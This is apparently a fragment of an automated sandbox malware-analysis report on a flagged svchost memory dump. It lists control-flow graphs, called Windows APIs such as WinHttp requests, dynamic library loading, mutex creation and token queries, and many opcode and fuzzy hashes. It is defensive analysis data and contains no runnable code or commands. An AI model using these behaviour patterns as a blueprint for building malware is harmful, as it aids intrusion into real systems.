          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Http$CloseHandle$FreeHeap$ConnectCountOpenTickmemset
          • String ID:
          • API String ID: 2154369044-0
          • Opcode ID: 8013fb579bf0e103eeaccab939ae22c85777802004ef9c5a42ee6ec905e88f47
          • Instruction ID: 6968e017db492f2cf7c0abe04c4aaab3eddd08ff69e7388afb2cb71fd0606d81
          • Opcode Fuzzy Hash: 8013fb579bf0e103eeaccab939ae22c85777802004ef9c5a42ee6ec905e88f47
          • Instruction Fuzzy Hash: 6BA1E172211BC185EB62DF22E8503EE33A1FB99BC8F445016EB895BB69DF39C585C710

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1570 14000d630-14000d659 1571 14000d7b8-14000d7bf 1570->1571 1572 14000d65f-14000d666 1570->1572 1573 14000d7c1 WinHttpCloseHandle 1571->1573 1574 14000d7c7-14000d7cd 1571->1574 1575 14000d672-14000d6bd WinHttpSetTimeouts call 14000e0c0 1572->1575 1576 14000d668-14000d66e WinHttpCloseHandle 1572->1576 1573->1574 1577 14000d7cf-14000d7e1 1574->1577 1580 14000d6d6-14000d710 WinHttpOpenRequest 1575->1580 1581 14000d6bf 1575->1581 1576->1575 1580->1571 1583 14000d716-14000d719 1580->1583 1582 14000d6c0-14000d6d4 1581->1582 1582->1580 1582->1582 1584 14000d745-14000d766 WinHttpSendRequest 1583->1584 1585 14000d71b-14000d743 WinHttpSetOption 1583->1585 1584->1571 1586 14000d768-14000d776 WinHttpReceiveResponse 1584->1586 1585->1571 1585->1584 1586->1571 1587 14000d778-14000d7a6 WinHttpQueryHeaders 1586->1587 1587->1571 1588 14000d7a8-14000d7b6 1587->1588 1588->1577
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Http$CloseHandleRequest$HeadersOpenOptionQueryReceiveResponseSendTimeouts
          • String ID:
          • API String ID: 1140403012-0
          • Opcode ID: aebf35e371f6fea2448f9b5fe53fe8f08ea4509975682a84b659a6bee2c47b2f
          • Instruction ID: eebc90c8ce48de3e98ba809765a9d91c4a9be35668c6a490bbbc6456ef9780f7
          • Opcode Fuzzy Hash: aebf35e371f6fea2448f9b5fe53fe8f08ea4509975682a84b659a6bee2c47b2f
          • Instruction Fuzzy Hash: C241B172208B8486EB25CF26F4507EA77A4F78CB88F54411AEB8D47768EF39C584CB50

          Control-flow Graph

          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressProc$Heap$Allocate$LibraryLoadProcessmemcpymemset
          • String ID:
          • API String ID: 2235880649-0
          • Opcode ID: 14afeceeeb4ff7259c377ccb9d912ef373db31879d69f19dba7fcc9a066632ef
          • Instruction ID: a4c0c1064b289df270925e2bef4429f91acbcf3427644b2579803443337a3f80
          • Opcode Fuzzy Hash: 14afeceeeb4ff7259c377ccb9d912ef373db31879d69f19dba7fcc9a066632ef
          • Instruction Fuzzy Hash: BD3105B5205B8581EA22DB16F9403D923A5FB8CBC8F484525EB8D17B7AEF7DC549C700

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1610 1400051b0-1400051f6 call 14000e0c0 1613 140005216-140005268 CreateFileW 1610->1613 1614 1400051f8 1610->1614 1616 14000532d-140005344 1613->1616 1617 14000526e-1400052b0 1613->1617 1615 140005200-140005214 1614->1615 1615->1613 1615->1615 1618 14000534a-140005362 call 14000bd60 1616->1618 1619 1400053dc-1400053df 1616->1619 1636 1400052b2-1400052b6 1617->1636 1637 1400052b8-1400052c8 call 14000e580 1617->1637 1623 14000540f-140005412 1618->1623 1630 140005368-14000536e 1618->1630 1622 1400053e1-1400053e4 1619->1622 1619->1623 1625 140005429-14000542c 1622->1625 1627 1400053e6-1400053f5 SysAllocString 1622->1627 1624 140005414-140005423 HeapFree 1623->1624 1623->1625 1624->1625 1628 140005443-140005456 1625->1628 1629 14000542e-14000543d HeapFree 1625->1629 1632 1400053f7-1400053fe 1627->1632 1633 14000540a 1627->1633 1629->1628 1634 140005378-14000537b 1630->1634 1635 140005370-140005376 1630->1635 1638 140005406 1632->1638 1639 140005400 SysFreeString 1632->1639 1633->1623 1634->1623 1641 140005381-140005383 1634->1641 1635->1634 1635->1635 1640 14000531d-140005324 1636->1640 1637->1640 1648 1400052ca-1400052f4 1637->1648 1638->1633 1639->1638 1640->1616 1643 140005385-14000538d 1641->1643 1644 140005398-14000539b 1641->1644 1646 140005391-140005394 1643->1646 1647 14000538f 1643->1647 1644->1623 1649 14000539d-1400053d5 call 14000ce20 1644->1649 1646->1641 1650 140005396 1646->1650 1647->1646 1653 1400052f6-1400052fc 1648->1653 1654 1400052fe-140005316 HeapFree 1648->1654 1649->1623 1657 1400053d7 1649->1657 1650->1623 1653->1640 1654->1640 1657->1619
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$Heap$String$AllocCreateFilememset
          • String ID:
          • API String ID: 3826130954-0
          • Opcode ID: fae366ad56029e99c8b42835498498ce8ea04f78aad266c8ab356c8bf4f7cfc6
          • Instruction ID: f085215ec8c7c62c59a82486073123279e41f5413f1e3ba3c0ef527c3a066285
          • Opcode Fuzzy Hash: fae366ad56029e99c8b42835498498ce8ea04f78aad266c8ab356c8bf4f7cfc6
          • Instruction Fuzzy Hash: C261817260578485EA62EF17F4107EB63A0F78EBD6F488125EF8903BA5DE78C845C740

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1683 14000e2b0-14000e2e3 ??2@YAPEAX_K@Z 1684 14000e2e5-14000e2fc memset 1683->1684 1685 14000e2fe 1683->1685 1686 14000e305-14000e319 1684->1686 1685->1686 1687 14000e320-14000e34c call 14000e0c0 1686->1687 1690 14000e366-14000e38a LoadLibraryExW 1687->1690 1691 14000e34e 1687->1691 1693 14000e3d4-14000e3db 1690->1693 1694 14000e38c-14000e391 1690->1694 1692 14000e350-14000e364 1691->1692 1692->1690 1692->1692 1693->1687 1696 14000e3e1-14000e401 1693->1696 1695 14000e3a0-14000e3d2 call 14000e0c0 GetProcAddress 1694->1695 1695->1693
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ??2@AddressLibraryLoadProcmemset
          • String ID:
          • API String ID: 2223267934-0
          • Opcode ID: 9fb993bdcbc7801996536c00c379125405486b2bffe6ba4f148ffbbb4ef29a0d
          • Instruction ID: 81936db8f0c84c524282d08abef79f670da5901e330344387f2b7120425cec9c
          • Opcode Fuzzy Hash: 9fb993bdcbc7801996536c00c379125405486b2bffe6ba4f148ffbbb4ef29a0d
          • Instruction Fuzzy Hash: B031A832610B8095EB22DF16F8543DE77A0F788BC8F884426EF995766ADF39CA45C740

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1699 140002500-14000256f CreateFileW 1700 140002575-1400025bb call 14000e580 1699->1700 1701 14000260e-140002611 1699->1701 1700->1701 1710 1400025bd-1400025e1 1700->1710 1702 140002623-140002626 1701->1702 1703 140002613-14000261d CloseHandle 1701->1703 1704 140002628-140002637 HeapFree 1702->1704 1705 14000263d-14000265d 1702->1705 1703->1702 1704->1705 1710->1701 1712 1400025e3-14000260a call 140002660 1710->1712 1712->1701
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$AddressCloseCreateFileHandleLibraryLoadProc
          • String ID:
          • API String ID: 1237944557-0
          • Opcode ID: 3d1678507d8a74de0c1391a12187dbe278e385b8dddfb17ae8026b01f3ab009b
          • Instruction ID: ca56da1b213637803f01061fd849376b3d0a0030e2058871fe79c7c9f7f8287a
          • Opcode Fuzzy Hash: 3d1678507d8a74de0c1391a12187dbe278e385b8dddfb17ae8026b01f3ab009b
          • Instruction Fuzzy Hash: 10314832204B8486E761DF17A854B9AB7A4F78CFD4F544229EF9D53BA8CF39C9018B40

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1715 1400175a0-1400175e6 call 14000e0c0 1718 140017606-14001762c ConvertStringSecurityDescriptorToSecurityDescriptorW 1715->1718 1719 1400175e8 1715->1719 1721 14001763e-140017646 1718->1721 1722 14001762e-14001763c 1718->1722 1720 1400175f0-140017604 1719->1720 1720->1718 1720->1720 1723 14001764b-140017687 call 14000e0c0 1721->1723 1722->1723 1726 1400176a6-1400176d1 CreateMutexExW 1723->1726 1727 140017689 1723->1727 1729 1400176d3 1726->1729 1730 1400176e0-1400176e3 1726->1730 1728 140017690-1400176a4 1727->1728 1728->1726 1728->1728 1729->1730 1731 1400176f1-140017719 1730->1731 1732 1400176e5-1400176f0 exit 1730->1732 1732->1731
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: DescriptorSecurity$ConvertCreateMutexStringexitmemset
          • String ID:
          • API String ID: 3507615276-0
          • Opcode ID: 7e300d048cb3985760b73ca4915f977cc0e0939f1735c7342c0fd7b69dda5c44
          • Instruction ID: b79e1125e13a50f3d4fcebabcacaf9d25f3fc3441ac5dd85b6d2232f2856bb17
          • Opcode Fuzzy Hash: 7e300d048cb3985760b73ca4915f977cc0e0939f1735c7342c0fd7b69dda5c44
          • Instruction Fuzzy Hash: 6D416D72204B8581DB228F16E4507EA77B0FB8DBC5F448066EB8D47769DF79C946CB40

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1734 14000cc50-14000cc95 GetCurrentProcess OpenProcessToken 1735 14000cc9b-14000cccb GetTokenInformation 1734->1735 1736 14000cd30-14000cd3b 1734->1736 1735->1736 1737 14000cccd-14000cd12 1735->1737 1738 14000cd4a-14000cd55 1736->1738 1739 14000cd3d 1736->1739 1737->1736 1743 14000cd14-14000cd2e 1737->1743 1740 14000cd64-14000cd6f 1738->1740 1741 14000cd57 1738->1741 1739->1738 1741->1740 1743->1736
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ProcessToken$CurrentInformationOpen
          • String ID:
          • API String ID: 2743777493-0
          • Opcode ID: ef76699d8adb88cef57f707c04710a59947ad96b4545d95d8a55f2534c219ce9
          • Instruction ID: c74a2c0aa10743c207ec1e219136a5575fa09d5bc2334c12703a290418d10ba9
          • Opcode Fuzzy Hash: ef76699d8adb88cef57f707c04710a59947ad96b4545d95d8a55f2534c219ce9
          • Instruction Fuzzy Hash: 65311A72615B8686DB61CF16E4947EEBBE4FBC8B84F044126DB8943B28DF38D549CB40
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressInfoNativeProcSystemmemset
          • String ID:
          • API String ID: 3639077814-0
          • Opcode ID: 73a227b09f757a1249d5b25b467e9ad04729ed7ee61bc8e6451ac5836c3fc14c
          • Instruction ID: 428b3f066b109f255c39e2ebfc4fbc54e526bd0559da4fecb65a859fdc128361
          • Opcode Fuzzy Hash: 73a227b09f757a1249d5b25b467e9ad04729ed7ee61bc8e6451ac5836c3fc14c
          • Instruction Fuzzy Hash: 8491FBB22116C595EF32CF26E8507EE37A0F7497C8F448012F7498BAA9DB79CA05C340
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: CreateFileFreeHeap
          • String ID:
          • API String ID: 1459815349-0
          • Opcode ID: b0f46708ea2e9a82fb6ec15b60a2f8f62c5783b32bb6e5bc0d22928c266d332d
          • Instruction ID: dd7d341a6ddd7bc526631075f0fb80800049f19760660bc5443f3113a62de7c7
          • Opcode Fuzzy Hash: b0f46708ea2e9a82fb6ec15b60a2f8f62c5783b32bb6e5bc0d22928c266d332d
          • Instruction Fuzzy Hash: 81314B7261478186E711DF17E494B9A7BA1F78CBD4F488129EF8907B68DF38C845CB80
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AttributesCreateDirectoryFilememset
          • String ID:
          • API String ID: 3166985337-0
          • Opcode ID: 4414997ff2b509ba6580369a37436964f2c3685859dd0f9b5ad18fc1192e98c7
          • Instruction ID: d08f49fb03eb16788e1f2746a93b41f384ca2382fbf5292e5098abddaf048789
          • Opcode Fuzzy Hash: 4414997ff2b509ba6580369a37436964f2c3685859dd0f9b5ad18fc1192e98c7
          • Instruction Fuzzy Hash: 6B113072204B8581DB218F1AE4503EA77E0FBD8B88F548162E79C476B6DF39C546CB40
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: File$CreateWrite
          • String ID:
          • API String ID: 2263783195-0
          • Opcode ID: e0412b5f0c366b7fd59986dc4c34bf7b5f1c6f6ff30c6d02afabf48581371de9
          • Instruction ID: 6b566774e5ba1e7250a1aff25ef7425d951c76e6d718e05acb62d09854b7e17e
          • Opcode Fuzzy Hash: e0412b5f0c366b7fd59986dc4c34bf7b5f1c6f6ff30c6d02afabf48581371de9
          • Instruction Fuzzy Hash: A7011E7261474086E7509F17F444B967AA0F78CFE4F544239AEA9437A4CB38C445CB40
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeapmemcpymemset
          • String ID:
          • API String ID: 2272576838-0
          • Opcode ID: 51c18e91f1064303174560168aadc5c6aca566d20f6d0a89bb2b7eb6c954fee7
          • Instruction ID: 99e73f2228a508996cf4c8a13348c1bb41ea3070cc7838c9278a1e980f1624d9
          • Opcode Fuzzy Hash: 51c18e91f1064303174560168aadc5c6aca566d20f6d0a89bb2b7eb6c954fee7
          • Instruction Fuzzy Hash: DA314972605FC082EB62CF52B8507EA77A0FB8DBC5F445029EB8957B69EE39C545CB00
          Memory Dump Source
          • Source File: 00000008.00000002.2670292321.00000159F28A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000159F28A0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_159f28a0000_svchost.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 44c00fefa8dee2791824ffa64c28be73b2be40f84a10099b5124b8c7914ad373
          • Instruction ID: 506f6ce6ae3d749395ba51f1ed03d0a12fd0800cc1e303c5ed1ea48ab79c9083
          • Opcode Fuzzy Hash: 44c00fefa8dee2791824ffa64c28be73b2be40f84a10099b5124b8c7914ad373
          • Instruction Fuzzy Hash: F771E570618E09EFDB94EF28C884F55B7E1FBA8315F60059AD00DCB655DB36E892CB81
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: HttpOpenmemset
          • String ID:
          • API String ID: 3913899868-0
          • Opcode ID: c9046dffb573574fc25c40d42e7c3ffdc45ad70a92c9c4164a8d46b4ec7af5c7
          • Instruction ID: 57ee3137514144bf60cce007febeb663930d62935e1599a4d347ca5d36fed9f5
          • Opcode Fuzzy Hash: c9046dffb573574fc25c40d42e7c3ffdc45ad70a92c9c4164a8d46b4ec7af5c7
          • Instruction Fuzzy Hash: 85213A72614B8482DB528F16E89039A73A4FB98B84F548116EB8D47775DF38C95ACB80
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: CreateInstance
          • String ID:
          • API String ID: 542301482-0
          • Opcode ID: b2322952a02dc2e0a26493a2b69036bfafc29e4732a14177607ed35dd8528dd4
          • Instruction ID: ba2811dbea9e4b9e57d6fd7a1f1aade179480009a3f334097c8843c2f9a4222c
          • Opcode Fuzzy Hash: b2322952a02dc2e0a26493a2b69036bfafc29e4732a14177607ed35dd8528dd4
          • Instruction Fuzzy Hash: CE11E536610B4482EB01CF2AE454399B3A1F78CB88F698025DB8C47724DF3AC59AC750
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Sleep
          • String ID:
          • API String ID: 3472027048-0
          • Opcode ID: 83407514344c0de2661e4134d07246bc1273eb1b6fe189e12909b0eb5b2e5137
          • Instruction ID: 51f4b8a512a9febe15be9ff3674927ed5db98c6055c24a172452396fe9aceb41
          • Opcode Fuzzy Hash: 83407514344c0de2661e4134d07246bc1273eb1b6fe189e12909b0eb5b2e5137
          • Instruction Fuzzy Hash: 02F01531A14B84C1EA02AB27E8543E963A0F38CFC1F4480A5EB0A0B3B2CE38C945C780
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6b102b2896f1fd4ed24110deb6751ec640bd2f57c3670500502afc6d79c5c785
          • Instruction ID: 64b1c6246bd7fc45bfa2b8b84f8586b4ddedd3468c74264c1831ae379150dc16
          • Opcode Fuzzy Hash: 6b102b2896f1fd4ed24110deb6751ec640bd2f57c3670500502afc6d79c5c785
          • Instruction Fuzzy Hash: B6717E72604B8586EB51CF26F4503EAB7A1F789BC8F544026FB8D93A69DF39C905CB40
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Http$CloseFreeHandleHeap$DataOpenQueryRequest$AddressAvailableConnectCrackHeadersLibraryLoadProcReadReceiveResponseSendTimeoutsmemset
          • String ID: h
          • API String ID: 924098880-2439710439
          • Opcode ID: 5381ae17751d1395b7447e3cb6081e5e3852b3b2c1ef0d6eebbe8c66b7312723
          • Instruction ID: 1498001942143cf4250ef2d81509e8fca94ec240472a1244b462215344734eb3
          • Opcode Fuzzy Hash: 5381ae17751d1395b7447e3cb6081e5e3852b3b2c1ef0d6eebbe8c66b7312723
          • Instruction Fuzzy Hash: FCA19031604A858AE762CF27A8547EA77B1FB8DBC8F044115EF4D4BBA8DF3AC5458740
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$Http$CloseHandle$ConnectOpenmemset
          • String ID: gfff
          • API String ID: 2669603317-1553575800
          • Opcode ID: a95b2586bbd460e69ec2be79498c36138f74c0e8d271ec2a65c1289937f3eb6e
          • Instruction ID: e375e4b6913abfcb066fb2510dea88db1f1922a69a85b8abfbf5752ff8901941
          • Opcode Fuzzy Hash: a95b2586bbd460e69ec2be79498c36138f74c0e8d271ec2a65c1289937f3eb6e
          • Instruction Fuzzy Hash: 64F17D72600B8482EB93DF16E8547EA27A8FB8DBD4F04411AEB8A577B5DF38C945C740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
